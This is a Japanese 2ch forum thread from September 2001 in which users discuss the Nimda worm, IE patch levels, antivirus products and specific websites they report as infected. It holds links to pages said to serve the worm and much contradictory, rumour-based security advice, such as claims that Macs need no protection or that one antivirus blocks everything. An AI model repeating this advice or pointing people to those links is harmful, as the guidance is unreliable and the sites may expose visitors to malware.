http://www.nimda.net/products/index.asp

150 :名無しさん@お腹いっぱい。:01/09/23 19:09
>>148
全て210.***.***.***だね。

151 :名無しさん@お腹いっぱい。:01/09/23 20:28
SP2にはずっとしてなかったんですが(今日やっとしました)
アクチブエックスとジャバスクリプトをオフにして
(クッキーだけはオンでした。ヤフオクができなくなるので)
ゾーンアラームをつけていたら、ウィルスを喰らわないで今の所すんでいました。

私の英語力は厨房並なので、ゾーンアラームがYESかNOか聞いてきたときは
ほとんど問答無用でNOにしてたんですが、それがよかったのかなぁ?

2chのウィルスバスターについての過去ログを読んで
ウィルスバスターも入れ直して、オンライン登録のところを「いいえ」にして
海外のトレンドマイクロのサイトからダウンロードしてくる方式に
変えました。(ウィルスバスター2000までの方式を持っている2001に適用)

あ、プリインストール版のマカフィーウィルススキャンを使ってる方へ。
それは不備だらけです。
私は今回の「ニムダウィルス」騒動がおきる1年前に、
マカフィーのアンチウィルスソフトを更新料払って使い続けようと思っていたのですが
2chのスレッドに、プリインストール版のマカフィーは
「アイラブユーウィルスに対応してないので、製品版を買ってください」
(更新料払ってもダメ)ということがサイトに書いてあったので、
「ふざけんな!!!」と思ってウィルスバスターを買ったので…。

(ノートンのほうが評判いいみたいなんですが、ウィルスバスターのほうが
 値段が安かったので、こっちを買いました)

152 :名無しさん@お腹いっぱい。:01/09/23 20:34
>>151
信頼できるニュースソースとして、2ちゃんねるがありますか。
そうですか…。

153 :名無しさん@お腹いっぱい。:01/09/23 20:44
>teal7.lab.novell.com - - [23/Sep/2001:13:21:29 +0900] "-" 408 -

CodeRedとNimdaに混ざってこんなのが1分ごとに16発連続であったけど…
何これ?
CodeRedの亜種?
Nimdaっぽくはなさげだけど…

154 :名無しさん@お腹いっぱい。:01/09/23 20:44
これが悪名高きNimdaか・・・

155 : :01/09/23 20:45
>>152
信頼できるかどうかというと一寸考えるが、情報はすごく早いので
重要な情報源の1つではあるな。
裏を取らないと信用できる情報にならないことだけが難点。

156 :dh046-bee.uel.ac.uk:01/09/23 20:46
今晩はイギリスからです(藁

157 :名無しさん@お腹いっぱい。:01/09/23 21:12
にむだアクセスが飛び抜けて激しいところがあって、
調べたらOCNにIPを持っていたので、
OCNに対応をお願いしたのが先週の木曜日。

・・・今日ログを見てみたら、1000越えてるんですが?
相変わらずどころか、アクセスが激しくなってるんですか?

158 :名無しさん@お腹いっぱい。:01/09/23 21:25
この期に及んで感染するなよ・・。

ttp://www1.sphere.ne.jp/noone/

159 :名無しさん@お腹いっぱい。:01/09/23 21:27
いやだいやだ┐(´ー`)┌

http://www.cameraguild.co.jp/officeheliar/moo/

160 :名無しさん@お腹いっぱい。:01/09/23 21:29
>>158
だからそこApacheだって。
恐らく便乗犯

161 :名無しさん@お腹いっぱい。:01/09/23 21:31
ここ、半分くらいアクセス不可・・。

http://space.sphere.ne.jp/rental/

162 :名無しさん@お腹いっぱい。:01/09/23 21:53
ヤラレターヨ(´Д`)

---

274 名前: 本日の投稿:01/09/23 11:22
2,3ヶ月前の事。
マカヒのアンインストールについてソースネクストにサポートを依頼したところ、下の回答だった。
・・・ウイルスソフトによって、OSから再インストを余儀なくされた。
ウイルスと同じくらいタチが悪い、と思う。
****************************************************
この度は弊社ソフトをご利用いただき、ありがとうございます。
ご質問の件ですが、ウイルススキャン単体の削除ですが、
Windows2000環境では、レジストリの編集を行うことができない為、
削除することは難しいかと思います。

リカバリは、システムの再構築を意味致しますので、ハードディスクドライブ
のフォーマットから、OSの再インストールを行うことになります。

現状では問題を解決することが難しいこと、また、自作DOS/V機に
関しては、動作対象外となる為、返品についてはお受け致しますので、
ご検討いただけないでしょうか。

ご不明な点がございましたら、お手数ですが、再度ご連絡ください。
今後とも、ソースネクストをよろしくお願いします。

163 :名無しさん@お腹いっぱい。:01/09/23 22:07
>>162
なんじゃそりゃ!?嫌がらせとしか思えん。
ちなみに元スレどこ?

164 :名無しさん@お腹いっぱい。:01/09/23 22:15
>>163

http://ton.2ch.net/test/read.cgi?bbs=sec&key=994010282&ls=100

ここです。

ちなみに私は質問はしませんでしたが、この状態になりました。

ウイルスバスターは、マカフィーもウイルスと見なしてアンインストールを要求しますが、この状態になってしまうと、ウイルスバスターはお手上げになってしまいます。

165 :名無しさん@お腹いっぱい。:01/09/23 22:19
>>160

IISを使っていて感染してApacheに変えたと思われ。

つーか、Apacheだってメール感染とかしてればニムダの場合ウイルスディスペンサーになるでは?

166 :名無しさん@お腹いっぱい。:01/09/23 22:21
>>160

Windows2000でApacheだったら、redeme.exe実行してもウイルス配布しないの?

167 :名無しさん@お腹いっぱい。:01/09/23 22:31
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

対象OSは増えてるんだね。
IE4.0は安全かなと思いこんで放置してなくて良かったよ。

168 :名無しさん@お腹いっぱい。:01/09/23 22:31
>>165 >>166
ソラリスなんだよなぁ。その前はIISだったのかなぁ。
あと、昨日だったかダイアルアップだと思うけど、CodeRedがきてて
netcraftで調べたらIISじゃなくてBJDだったんだよな。
たまたまIISのときアタックしてその後停止でBJDかなぁ。
M$のいうように、停止中は活動しないのかインストールしてるだけ
でダメなのかよくわからない。

169 :167:01/09/23 22:31
OSじゃのうてIEのVer.だべ。

170 :名無しさん@お腹いっぱい。:01/09/23 22:34
>>97

http://ton.2ch.net/test/read.cgi?bbs=sec&key=994010282&ls=100
294 名前:名無しさん@お腹いっぱい。 本日の投稿:01/09/23 22:15
>288
バーテックスリンク社のアンチドートでしょ?
バスターやノートンと同じく市販されてるよ。

使ってるけど、アップデートが結構メンドイ。

171 :168:01/09/23 22:36
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www1.sphere.ne.jp
ここって、最近変えたのなら残るよねぇ。
元々Apacheとソラリスだと思うのだが違うのか?

172 :名無しさん@お腹いっぱい。:01/09/23 22:37
>>168

前スレにLinuxであっても、Web公開してるフォルダをWinと共有してたら、htmlに感染JavaScript埋め込まれて、redeme.eml置いて行かれた、ってな趣旨の書き込みがあったぞ。

173 :名無しさん@お腹いっぱい。:01/09/23 22:43
>>172

すまん、「Web公開してる」は埋め込まれとは関係ない。

この状態でWeb公開してると、Linuxでもニムダ供給サイトになるのでは、と。

174 :名無しさん@お腹いっぱい。:01/09/23 22:50
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301&ls=100
>>451

175 :名無しさん@お腹いっぱい。:01/09/23 22:52
http://ton.ch.net/test/read.cgi?bbs=sec&key=1000870301&ls=100
>>456

176 :名無しさん@お腹いっぱい。:01/09/23 23:02
>>171

ユーザーが感染マシンでhtml編集していて、フォルダの中身丸ごとアプしてたらどうよ。

177 :名無しさん@お腹いっぱい。:01/09/23 23:12
>>168

現実問題として、ある程度の規模のWebサイトを公開している企業などで
は、当然ながらファイア・ウォールを立てて、DMZセグメントのひとつを外
部用として、公開用Webサーバを置き、内部と外部を分けてセキュリティ
確保を行っている。

で、この公開用Webサーバの更新方法はいくつかあるけど、内部用DMZ
セグメントにバックアップ兼用サーバを置いて、ミラーリングする方法や、
専用のファイル共有サーバを置いてコンテンツを置く方法など、いつかの
やり方がある。

いずれにせよ、大規模Webサイトをメンテナンスするには、分業体制でコ
ンテンツを更新しているが、コンテンツの作成・更新作業は、Windowsクラ
イアント・マシンで行われ、動作確認を行った上で、ファイル転送される。

この時に、Webコンテンツのファイル転送を受ける中間サーバがWindows
機とファイル共有しているシステムだったり、転送が差分について無条件
で行われるシステムだと、nimdaによってJAVAのスクリプトが書き込まれ
たhtmlファイルとreadme.emlファイルが公開用Webサーバに送り込まれて
しまう。

これは、公開用のWebサーバのソフトがIISでなくても、またプラットフォー
ムがUNIX系であっても発生する事態である。

ということで、トータルのWebシステム、コンテンツ管理システムがどうなっ
ているかで、サーバがUNIX&Apacheであってもnimdaの感染源サイトにな
りうるということ。

178 :貧乏人:01/09/23 23:17
前に貧乏でソフトが買えないって云ってたもんだけど
入れてみた。ウィルスバスター体験版。
常駐してると重そうからさっさと常駐切ったんだけど、
HPにアクセスするたびにロゴが出てウザイ。なんとかならんの?
というか常駐切ってるのにいちいちチェックしてくれるのか

179 ::01/09/23 23:17
http://cgi.members.interq.or.jp/orange/stop/abvoid/picture.cgi
↑これなら大丈夫

180 :金持ち:01/09/23 23:28
>>178
重く感じないマシンを使え!(w

181 :名無しさん@お腹いっぱい。:01/09/23 23:29
>>178
ウィルスバスターのHPチェック機能は重いのにヘッポコだそうだから
他のソフトを通したほうがイイよ!!

182 :名無しさん@お腹いっぱい。:01/09/23 23:45
質問が戻って悪いんだけど、結局IE5.5のSP2も、IE6もセキュリティ上は変わらないで、どちらもSP1よりは強化されてるってことでいいんだよね?
だったらどうせアップするならIE6にしといた方がいいって考えていい?
IE5.5SP2の方がIE6より勝ってるとこあるの?

183 :名無しさん@お腹いっぱい。:01/09/23 23:51
>>178

以前はウイルスバスター2001正規版を使っていた。

ロゴ出しはオフにすることができたような。

私も重い(またはウザイ)と感じて切っているスキに感染した(当時最新のVBでも感染したろうが。)。

重いと切ってはなんにもならない。

以後ノートンさんを使っているがこれは重いとは感じない。

が、使っているのはインターネットセキュリティーなので価格面で貴方の要望は満たせないと思う。

安い・軽い・高機能・安全 のすべてを満たすソフトなど私は知らない。

ウイルス関連ソフトはサーチ・駆除も重要だが、ニムダ以降ブロック機能も重要であると痛感した。

理由はともかく、この程度のソフトが運用できないなら、いずれ自分だけでなく他者にも迷惑をかけるのでネットを利用しないほうがよいと思った。

184 : :01/09/23 23:53
ここネットワーク機器の会社のくせに感染してます。
http://www.d-link.co.jp/

185 :名無しさん@お腹いっぱい。:01/09/23 23:55
>>182

>>26-30を読んで自分で判断してくれ。

「結局IE5.5のSP2も、IE6もセキュリティ上は変わらない」という記述を漏れは見ていないし、信じない。

>>26-30の後ろにもいくつか関連したカキコがある。

186 :win2k+ie6 最悪:01/09/23 23:56
>>182
Win2000+ie6(最小構成時のみ)=Nimdaワームの影響を受ける恐れのある製品
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

2kは最小構成でしかインストールできないためIE6は駄目。

187 :名無しさん@お腹いっぱい。:01/09/23 23:58
>>184

だっさー、これはダサイ(´Д`)

188 :名無しさん@お腹いっぱい。:01/09/23 23:59
>>182
具体的な根拠ではないが、一般論として
新製品は使い込まれておらずバグが残っている可能性が高い。

189 :182:01/09/24 00:07
>>185
「26〜30」の辺りも読んでみて、それでIE5.5SP2も危ないけど、IE6だって危ないよって、受けとめたわけっす。
ならばどっちも同じ条件で危なくて、どっちもSP1よりは危なくないならば、IE6のほうが新しくていいかなあ、って思ったわけっす。
それでもSP2を使ったほうがいいのだよ、っていう情報あるならば、もちろんその方を漏れは使いたいのだった。
舌足らずですんません。

190 :貧乏人:01/09/24 00:10
>>183
ははは 失敬
アドバンスモードってヤツで設定できるのね。
30分前に入れたばっかだったんで。
金持ちはいいな。ない袖は振れん。

191 :WinMEですが、:01/09/24 00:11
nimdaに感染していないかどうか調べた結果ファイルは発見されなかったのだか
ファイル検索の「含まれる文字列」で" nimda "の文字列で検索をかけると
user.datのファイルにヒットしてしまう。これって何だろう?

192 :名無しさん@お腹いっぱい。:01/09/24 00:14
W2K+IE6で感染サイトにアクセスしてみた。
メディアプレーヤが起動することもreadme.exeが自動実行されることもなく、
ダウンロード要求ダイアログが表示される。
ということで、W2K版IE6でも50.1SP2及び5.5SP2と同様の対策がされているものと思う。

IEインストールフォルダにあるreadme.txtの
>現在、Windows 2000 で標準インストールおよび完全インストールを実行することは
>できません。Internet Explorer 6 はシステムに既定のファイル セットをインストール
>します。これらは、Internet Explorer 6 の Web ブラウザおよびスクリプティングの
>サポートが含まれています。

という記述が現在の混乱を招いているようである。

193 : :01/09/24 00:15
>>191
実行中のコマンドと思われ

194 : :01/09/24 00:17
>>187
それをいうならMicroSoft・・・。

195 :名無しさん@お腹いっぱい。:01/09/24 00:18
WIN95だとIE6.0ってインストール出来ないんだね。
WIN98以降にしろってメッセージが出てお終い。。。

ってなわけでIE5.5SP2にしました。

196 :名無しさん@お腹いっぱい。:01/09/24 00:20
>>189

>「26〜30」の辺りも読んでみて、それでIE5.5SP2も危ないけど、IE6だって危ないよって、受けとめたわけっす。

すまん、漏れにはどうしてそいう判断になったのかわからん。

漏れ個人的には両方アブナイなら、どちらかといえばIE5.5SP2だろうし、もしあなたがIE5.0xを使っているならIE5.5などにせずIE5.01SP2を勧めたい。

IE6が安全であるという記述はどこにも発見出来ないと思うが・・。

197 :名無しさん@お腹いっぱい。:01/09/24 00:23
>>191
nimdaを検索したからだろ。たぶん検索履歴だよ。
#user.datはレジストリファイルだ。

それから、nimdaは自身をnimdaと名乗ってないから
nimdaって文字列を探しても無意味だよ。

198 :名無しさん@お腹いっぱい。:01/09/24 00:23
>>194

MSはダサイというのとは次元がちがう。MSはそういう会社。だからMSNが感染してもさもありなんと思うだけ。

199 :名無しさん@お腹いっぱい。:01/09/24 00:24
IE6情報が混乱してますねぇ

正直、W2k+IE6で感染しちゃった人手を上げてー

200 :名無しさん@お腹いっぱい。:01/09/24 00:25
>>192
> IEインストールフォルダにあるreadme.txtの
> >現在、Windows 2000 で標準インストールおよび完全インストールを実行することは
> >できません。Internet Explorer 6 はシステムに既定のファイル セットをインストール
> >します。これらは、Internet Explorer 6 の Web ブラウザおよびスクリプティングの
> >サポートが含まれています。
>
> という記述が現在の混乱を招いているようである。
言えてる。
Windows9xへの最小構成インストールだとOE6が入らないのに、
Windows2000へのインストールだとOE6が入るという一点をとっても
Windows2000のIE6は最小構成インストールだというのはウソ。

201 :名無しさん@お腹いっぱい。:01/09/24 00:28
>>191

「nimdaに感染していないかどうか調べた」というのが、なにをやっているのかこの文面だとわからないけど、26-30を読んでみてくれ。

安易に検索などかけないほうがよいと思う。

202 :名無しさん@お腹いっぱい。:01/09/24 00:32
>>192
IE6を入れる前のW2KのSPとIEのバージョンおよびSPを教えてくれませんか?

203 :名無しさん@お腹いっぱい。:01/09/24 00:32
>>200

するとこれはデマか?
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/

204 :名無しさん@お腹いっぱい。:01/09/24 00:34
>>200

そうだとして、IE5.5SP2 よりも IE6 を推奨する理由は?

205 :名無しさん@お腹いっぱい。:01/09/24 00:38
>>199
多分、感染すると思われ。
IE6+Win2KSP2+ノートン7.51(定義ファイル30920d)で感染サイトに行くと、
ノートン先生が水際で止めてくれる。
IEの確認ダイアログなんかは出てこない。

206 :189:01/09/24 00:40
>>196
実はIE5.5にして不安定になったもんで、IE5.01でずっと使ってたんです。
それがSPだったもんで、今回見事にやられちゃって、それでめんどうだからOS入れ直しちゃえと思ったわけなんですけど、どうせピカピカになるなら新品のIE6などいいかなと思ったわけで(苦笑)
ほんとミーハーだ(苦笑)
そっかぁ、じゃ、IE5.01SP2にしときます。馴染んでたのでよかった。
ありがとうございました。

207 :192:01/09/24 00:40
>>202
W2KSP2+IE5.5SP2

>>205
俺のとこではダイアログ出たんだよねえ。

まあ、この問題に関してはMSに直接聞いてみないとハッキリしないでしょ。
ちなみに、この板のように慎重で初物を警戒する人が少ないWin板では、
W2KとIE6の組み合わせでニムダにやられた!って騒いでる様子はないよ。

208 :名無しさん@お腹いっぱい。:01/09/24 00:41
ニムダ対策のためIE5.5のSP2にしようと思っているんですが、
「タスク スケジューラの署名を確認しています」
ってところで止まってしまって、
ダウンロードが強制終了させられてしまうんですけど、
なにか対策はないでしょうか?

209 :名無しさん@お腹いっぱい。:01/09/24 00:41
>>192

前スレでメディアプレーヤが起動したという報告があるけど、>>192の一例だけで全否定しちゃっていいのかな?安全の否定は簡単だが、危険の可能性の否定はそう簡単に出来ないと思うが・・。

210 :チャレンジャー:01/09/24 00:43
当方、Win2KSP2+IE6
ノートン先生のAuto-Protectを切って感染サイトに行ったところ、
Windows Mediaのサイトにつながり
"Sorry, no more help is available for this problem at this time."

211 :191:01/09/24 00:43
>>193 >>197 >>201
ありがとう。問題はないと言う事ですね。
検索で他の文字列だとヒットしなかったので
ちょっと心配になったので聞いてみました
過去ログ>>26-30を見てきます。

212 :名無しさん@お腹いっぱい。:01/09/24 00:43
>>209
危険の否定はしてないよん。
現実に回避できたので「対策がされているものと思う」と見解を出しただけ。

213 :名無しさん@お腹いっぱい。:01/09/24 00:45
感染したファイルはクリックしただけでやばいっていうけど、ノートン先生入れてれば大丈夫?
そういうHP開いてもインターネットセキュリティが防いでくれる?

214 :困った。:01/09/24 00:47
Macintosh 用の対策ファイルは何処からダウンロード出来るんでしょうか。

215 :名無しさん@お腹いっぱい。:01/09/24 00:48
>>213
少なくともリアルタイムスキャンを有効にしている限りは

216 : :01/09/24 00:50
>>209
ハア? IEのセキュリティホールってのは
JavaスクリプトにWAVファイルとしてreadme.exeを開けさせる
というのは常識ですよ?

217 : :01/09/24 00:51
>>208
過去ログを調べようともしない質問君は放置ニダ!

218 :名無しさん@お腹いっぱい。:01/09/24 00:53
>>215
それ、いつもしてるのに、たまにしてない時とかに限ってそういうの起こるんですよね・・
なんとかの法則かな・・
っていうか、漏れがアホなだけか・・

219 :名無しさん@お腹いっぱい。:01/09/24 00:53
>>214

マックは対策せんでもいいだろ
感染しないんだから

220 :とにかく:01/09/24 00:54
当のMSがインストールの仕方如何で「Nimda ワーム の影響を受ける恐れのある製品 」と公認しているIE6を勧める気にはなれない。

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品

:                    ρ(^-^)インストールのやり方次第ということ
MicrosoftR Internet Explorer 6 (最小構成時のみ)

---
MicrosoftR Internet Explorer 6 は、MS公認の Nimda ワーム の影響を受ける恐れのある製品 であります。

221 :名無しさん@お腹いっぱい。:01/09/24 00:54
>>207
サンクス。
どうもW2Kの場合IE6をインストールするまえの状態で、
どうも状況かわるみたい。ただ俺の場合キミと同じはずなんだが
MediaPlayerがエラーを出す。わけわからん^^;
IE6入れる前に最低W2KのSP2は入れておかないとよくないようだが…

222 : :01/09/24 00:54
>>213
駄目!
ノートン入れてりゃなんでもOKだと思ってるんかい?

223 :名無しさん@お腹いっぱい。:01/09/24 00:54
>>203
> 最小限のインストール
が最小構成インストールとは別物なのは確か。

>>204
別に推奨する気はない。
>>48 みたいな明らかなウソ(OE6がインストールされない)を書かれるのが
嫌で書いただけ。

224 :名無しさん@お腹いっぱい。:01/09/24 00:55
>>216

ハア? 

225 : :01/09/24 00:57
>>210
感染した可能性大。

226 :210:01/09/24 00:58
>>225
残念ながら、感染してない。

227 :205:01/09/24 00:58
>>207
もっかい試したが、やっぱでない。
IEの設定の問題か?<インストール時のまんま。

ただ、感染サイトにアクセスした後リブートすると、メディアプレーヤーのゾンビが残ってる。。。
その後スキャンかけても問題ないけど、新種の話はまだ出てないよね?

228 :名無しさん@お腹いっぱい。:01/09/24 01:00
>>222
えええ、ノートン先生入れとけば、たとえ負債抱えてこわいおっちゃんに追いかけられても大丈夫なんじゃないんですか?
そのこわいおっちゃんのオンナに手ぇ出しても、ノートン先生入れてれば大丈夫なんじゃないんですかあ?

229 :名無しさん@お腹いっぱい。:01/09/24 01:02
>>208
だから、IE5.01SP2入れとけってば

230 :名無しさん@お腹いっぱい。:01/09/24 01:03
もういちいちフォローするのもめんどくさいのだが・・。
いくつかIE6で発生した問題現象が報告されている。
たまたま自分の環境でそうならかなったからといって、質問君が「IE6は?」と来ているときにいちいち質問君がIE6が安全であると誤解するような例をカキコするのはやめてくれ。


>>223

>>48 みたいな明らかなウソ(OE6がインストールされない)を書かれるのが
嫌で書いただけ。

なら最初からそう書いてくれ。

231 :困った:01/09/24 01:04
>>219
あれま、探しても見つからない訳だ。
ありがと

232 :名無しさん@お腹いっぱい。:01/09/24 01:04
>>228

はい、>>228のPCに限ってそのとおりです。

233 :名無しさん@お腹いっぱい。:01/09/24 01:07
>>230
たのもしい。 疲れるでしょうが頑張ってください。
教えて君はけっこう切実ですから、私も含めてほんと助かってます。

234 :名無しさん@お腹いっぱい。:01/09/24 01:09
>>230
空きHDDが出たから2Kインストールして今から感染実験してみようと思う。
LINUX+Apacheに感染サイト作ってアクセスみればいいかな?

235 :名無しさん@お腹いっぱい。:01/09/24 01:11
そういえば、ノートンってドンフライに負けたな・・

236 :名無しさん@お腹いっぱい。:01/09/24 01:15
でもさ、クリックしただけで感染するとか、HP開いただけで感染するとかって、メチャクチャだよね。
今までは「見つかっても実行しなきゃ大丈夫」とかって、最後の砦があったじゃん。
こんなウィルスがポピュラーになっちゃったら、またまたPC売れなくなっちゃうよ。
ビッグカメラあんなにPC館増やしてんのにどうすんねん。

237 :名無しさん@お腹いっぱい。:01/09/24 01:15
>>234

>>LINUX+Apacheに感染サイト作ってアクセスみればいいかな?

かっこいいっo(><)o
実験が済んだら、ぜひLINUXやApacheならニムダに感染しないと声高に叫ぶバカのために、啓蒙サイト(無害化ニムダを送り込むとか)として公開してくださいm(_ _)m

238 :名無しさん@お腹いっぱい。:01/09/24 01:17
>>236

> ビッグカメラあんなにPC館増やしてんのにどうすんねん。

このスレの趣旨とは無関係に激しく同意!(苦笑

239 :名無しさん@お腹いっぱい。:01/09/24 01:19
>>237

それとは違うだろ

240 :名無しさん@お腹いっぱい。:01/09/24 01:21
>>238
別にいいじゃん
ビックカメラが潰れても他がある

241 :先に釘を刺しておくが:01/09/24 01:31
本スレは粘着フォーマット君は却下だ。

感染時にフォーマット・再インストールは、有効であり唯一の確実な手段だが、
無条件にとにかくフォーマットという意見は聞き入れない。

各位には、安易にその場でフォーマットを援護射撃などされないよう充分注意されたい。

以上。

242 :名無しさん@お腹いっぱい。:01/09/24 01:32
>>240

有楽町旧そごうビルに潰れ伝説ができる(w

243 :名無しさん@お腹いっぱい。:01/09/24 01:36
だれか感染してるぞって教えてやれよってカンジ・・。

ttp://www1.sphere.ne.jp/noone/

244 :234:01/09/24 01:39
外部から隔離したネットワークとApacheの感染サイトは無事作成出来たよん。
2Kのインストールが遅い・・・・

245 :名無しさん@お腹いっぱい。:01/09/24 01:42
>>239
それはともかく、ニムダに感染したっつーとすぐ

LINUX にしろ だの Apache が感染するわけない だの Netscape だ だの

という手合いのはどうにかならないかね。
扱いによっては感染(MS語の 影響を受ける、か(苦笑))するということを分かっていてやっているのかどうか・・。

246 : :01/09/24 01:43
nimda発症数は平常値(?)に戻った模様(CodeRed並)
週明けの社内ネット起動でもう一山あるだろうけど、
感染力が強力な割には、意外と早く収束した感じ。

247 :名無しさん@お腹いっぱい。:01/09/24 01:43
>>243
だからその話をさっきしてたんだが。
結局鯖感染か、ユーザ感染かよくわからんな。
ま、可能性はいろいろあるとして、おれは故意だと思うけどね。

248 :名無しさん@お腹いっぱい。:01/09/24 01:43
>>244
もしよかったらW2K(SPなし)にIE6インストールしてみて、感染するか
試してほしい…

このパターンだと感染する気がする…

249 :名無しさん@お腹いっぱい。:01/09/24 01:46
>>245

それは中継になるってことで感染はしないよな
感染経路を減らせるから確率落ちるんでないか?

250 : :01/09/24 01:47
>>248
OE6にならないと感染するらしい。

251 :名無しさん@お腹いっぱい。:01/09/24 01:47
>>244

>Apacheの感染サイトは無事作成出来た

何度読んでもすばらしい。
>>160とかにも見せてやりたい。

252 :名無しさん@お腹いっぱい。:01/09/24 01:48
>>246

どこが収束してるんだ?
http://wtc.trendmicro.com/wtc/

253 : :01/09/24 01:49
まだnimdaをIIS攻撃ワームだと思ってる奴は馬鹿。

254 :名無しさん@お腹いっぱい。:01/09/24 01:49
>>247

あ、このサイトが悪意っていう意味?
わざとニムダディスペンス機能をアプしてると?
こりゃまた失礼m(_ _)m

255 :160:01/09/24 01:50
>>251
見てるがなにか?
つか、htmlに感染したのと同じ記述をすれば、擬似的に感染サイト
に仕立てることも出来るだろ。
馬鹿馬鹿しい。

256 :名無しさん@お腹いっぱい。:01/09/24 01:50
ちなみに俺の予想

W2K + IE6 …感染する
W2KSP2 + IE6 …感染しない (この状態でIE5.01SP2相当のはずだから)
W2K + IE5.5 + IE6…感染する (報告あり)
W2KSP2 + IE5.5 + IE6…感染する (W2KSP2にIE5.5をいれるとまずいという話を聞いた)
W2K + IE5.5SP2 + IE6…感染しない (IE5.5SP2が防いでくれるはず))
W2KSP2 + IE5.5SP2 + IE6…感染しない (俺の環境)

257 :名無しさん@お腹いっぱい。:01/09/24 01:52
>>250
その話は知っているが、W2KにIE6を入れた場合、どのパターンでも
OE6にはなるようだ。(少なくともOEの画面表示は)

258 :名無しさん@お腹いっぱい。:01/09/24 01:53
>>256
IISの記述が抜けてるぞ

259 :名無しさん@お腹いっぱい。:01/09/24 01:55
>>258
俺がいってるのはIE経由の感染の話。
もちろんIIS経由の感染はまた別。

260 :名無しさん@お腹いっぱい。:01/09/24 01:55
鯖感染なら
http://www1.sphere.ne.jp/
で感染する。

わざと置いてる可能性大

261 : :01/09/24 01:58
>>252
http://wtc.trendmicro.com/wtc/report.html

262 :名無しさん@お腹いっぱい。:01/09/24 01:59
>>260

そうか。この期に及んで個人サイトで感染しているようなのはわざと置いているとみたほうが合理的か・・。
いまさらでスマソ。

263 : :01/09/24 02:00
>>260
nimda居ないよ?

264 :名無しさん@お腹いっぱい。:01/09/24 02:03
>> 260 よくウイルスを収集して研究用と称して開帳しているページがあるが、そういうところがわざと置いたりなんてやりかねないよな。
今後は気を付けないといけないなぁ・・。

265 :263:01/09/24 02:04
ああ、IISの方か。

266 :名無しさん@お腹いっぱい。:01/09/24 02:05
>>263

漏れもいないと思った。
問題にしているのはここ。

tp://www1.sphere.ne.jp/noone/

267 :160:01/09/24 02:05
>>263
だぁから
www1.sphere.ne.jp/noone/で感染してるのに、
鯖www1.sphere.ne.jpで感染してないから
故意じゃないかって逝ってるんだよ。

268 :名無しさん@お腹いっぱい。:01/09/24 02:06
>>265
あ、そゆことね。失礼。

269 :名無しさん@お腹いっぱい。:01/09/24 02:07
>>261

それ、どのウイルスも0で終わってるだろ
収束してるんじゃないよ

270 :名無しさん@お腹いっぱい。:01/09/24 02:08
>>267

>>160- のカキコは 常に説明不足で無用な誤解を巻き起こしていると思われ

271 :名無しさん@お腹いっぱい。:01/09/24 02:10
ふむ。さすがに>>260から>>263を深読みできる人間は少ないと思われ。

272 :名無しさん@お腹いっぱい。:01/09/24 02:12
>>256
MS(KK)のスタッフはこの連休中も徹夜でこういう検証をやっているのだろうか?やっていないな、たぶん。

273 :名無しさん@お腹いっぱい。:01/09/24 02:14
>>271
答えを聞けば意味はわかるんだが。>>160-

274 :160:01/09/24 02:17
>>270
説明不要だろ?それから>>260はおれではない。

騒ぐまえに鯖がIISかどうか調べたか?
IISでなかったらどのような経路で感染したか考えたか?
Apache自体が直接的に感染することはないんだから
Windowsから感染したファイルが流れ込んだしかないだろ。
商業プロバイダはファイル転送は個人個人なんだから
プロバイダ鯖経由で感染とは考え難く、
www1.sphere.ne.jp/noone/が故意か誤ってかユーザ経由で
感染させてるしかないだろう。

それくらい自分で頭働かせろ。今更なにいってんだ。

275 :やる必要無いじゃん:01/09/24 02:18
>>272
この際全部IE6にすれば感染しないホラを吹きまくって
ユーザを無理矢理IE6へ移行させる作戦さ♪

276 :名無しさん@お腹いっぱい。:01/09/24 02:21
ttp://www1.sphere.ne.jp/noone/
は、ここの被害の2に当たると思われ
http://www.trendmicro.co.jp/virusinfo/important3.htm#penimdaa

277 :名無しさん@お腹いっぱい。:01/09/24 02:22
>>274

最初からそのくらい書いてくれりゃいいのに・・。

278 :名無しさん@お腹いっぱい。:01/09/24 02:25
>>275

冗談抜きにそういう信仰があるよな。
一般のPCには感染しないなんてカキコまであって、見たときは吹いた。マジで。

279 :名無しさん@お腹いっぱい。:01/09/24 02:28
>>275 このあとXPなら大丈夫なんて流布されるようになったら完全に某社陰謀ですね(^^;

280 :名無しさん@お腹いっぱい。:01/09/24 02:30
ふふふ。あまいな。俺の会社じゃネットワーク管理者から、nimdaがはやってるから
不信なメールに注意しろってアナウンスがあったぞ。(Webからの感染には一切ふれず)
で、ウィルスチェックをかかさずやりましょうって。それは間違ってないが、IEの
穴をふさぐのが先だろっつーの。あきれたよ。

281 :名無しさん@お腹いっぱい。:01/09/24 02:30
>>279
XPはでっかい穴があいてる予感がするので様子見ることにしてる。
 −>根拠なし、ただの経験則。

282 :名無しさん@お腹いっぱい。:01/09/24 02:32
>>281

一般にSPは2から、バージョンは3からっていうMSの法則がありますよね(^^;

283 :名無しさん@お腹いっぱい。:01/09/24 02:35
このすれはいいYO ageageageageageageageageageageage

284 :名無しさん@お腹いっぱい。:01/09/24 02:34
前からネスケで、java切りcookie切り串通しが安全って言うじゃん。
IEなんか使うから天誅くらうんや。
厨房を見習え!

285 :名無しさん@お腹いっぱい。:01/09/24 02:38
ttp://www1.sphere.ne.jp/noone/
ついに誰か書き込んだな。初の書き込みがこれか…(笑

286 :名無しさん@お腹いっぱい。:01/09/24 02:39
あしたの朝>>49-94みたくなってたらイヤなのでsage

287 :名無しさん@お腹いっぱい。:01/09/24 02:40
>>285
http://www1.sphere.ne.jp/cgi-bin/common1/bbs/bbs.cgi
わはは。暗澹たる船出ですね(^^;

288 :名無しさん@お腹いっぱい。:01/09/24 02:40
>>285
最高!

289 :名無しさん@お腹いっぱい。:01/09/24 02:42
>>284

か~ しヽ ιゅ⊃ です>>245

290 :名無しさん@お腹いっぱい。:01/09/24 02:48
ttp://www1.sphere.ne.jp/noone/

ここ変わったぞ

291 :名無しさん@お腹いっぱい。:01/09/24 02:49
Nimda除去したみたい

292 :名無しさん@お腹いっぱい。:01/09/24 03:10
ここに書くと国内サイトは直後に駆除されるよ(w

293 :名無しさん@お腹いっぱい。:01/09/24 03:12
tp://www.d-link.co.jp/
ここはいつだろね

294 :名無しさん@お腹いっぱい。:01/09/24 03:13
>>292
良いことだネ!

295 :やや:01/09/24 03:16
